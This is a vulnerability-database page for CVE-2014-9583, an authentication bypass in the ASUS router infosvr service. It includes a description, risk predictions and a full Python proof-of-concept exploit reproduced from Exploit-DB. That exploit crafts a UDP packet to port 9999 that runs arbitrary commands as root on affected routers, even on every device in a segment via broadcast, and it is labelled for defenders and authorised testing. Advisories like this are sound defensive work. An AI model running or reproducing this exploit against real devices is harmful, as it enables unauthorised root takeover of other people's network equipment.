VIR Vulnerability Intelligence Relay

CVE-2014-9583

critical
Published 2015-01-08 ยท Modified 2026-05-06
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-44524 remote hardware verified
Metasploit ยท 2018-04-24

ASUS infosvr - Authentication Bypass Command Execution (Metasploit)

Source code queued for fetch โ€” refresh in a moment.
EDB-35688 remote hardware verified python ยท 3 KB
Friedrich Postelstorfer ยท 2015-01-04

ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution

python exploit Source: Exploit-DB 
#!/usr/bin/env python3

# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage: http://www.asus.com/
# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U

# Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
# "iboxcom.h" is in asuswrt/release/src/router/shared.
#
# Affected devices may also include wireless repeaters and other networking
# products, especially the ones which have "Device Discovery" in their features
# list.
#
# Using broadcast address as the IP address should work and execute the command
# on all devices in the network segment, but only receiving one response is
# supported by this script.

import sys, os, socket, struct


PORT = 9999

if len(sys.argv) < 3:
    print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)
    sys.exit(1)


ip = sys.argv[1]
cmd = sys.argv[2]

enccmd = cmd.encode()

if len(enccmd) > 237:
    # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server. 
    print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)
    sys.exit(1)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', PORT))
sock.settimeout(2)

# Request consists of following things
# ServiceID     [byte]      ; NET_SERVICE_ID_IBOX_INFO
# PacketType    [byte]      ; NET_PACKET_TYPE_CMD
# OpCode        [word]      ; NET_CMD_ID_MANU_CMD
# Info          [dword]     ; Comment: "Or Transaction ID"
# MacAddress    [byte[6]]   ; Double-wrongly "checked" with memcpy instead of memcmp
# Password      [byte[32]]  ; Not checked at all
# Length        [word]
# Command       [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable

packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')

sock.sendto(packet, (ip, PORT))


# Response consists of following things
# ServiceID     [byte]      ; NET_SERVICE_ID_IBOX_INFO
# PacketType    [byte]      ; NET_PACKET_TYPE_RES
# OpCode        [word]      ; NET_CMD_ID_MANU_CMD
# Info          [dword]     ; Equal to Info of request
# MacAddress    [byte[6]]   ; Filled in for us
# Length        [word]
# Result        [byte[420]] ; Actually returns that amount

while True:
    data, addr = sock.recvfrom(512)

    if len(data) == 512 and data[1] == 22:
        break

length = struct.unpack('<H', data[14:16])[0]
s = slice(16, 16+length)
sys.stdout.buffer.write(data[s])

sock.close()

Metasploit modules

exploit_linux/misc/asus_infosvr_auth_bypass_exec rank 600
ASUS infosvr Auth Bypass Command Execution
Source fetch failed: fetch_error โ€” view the original via the link above.

References

CWEs

CWE-264

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.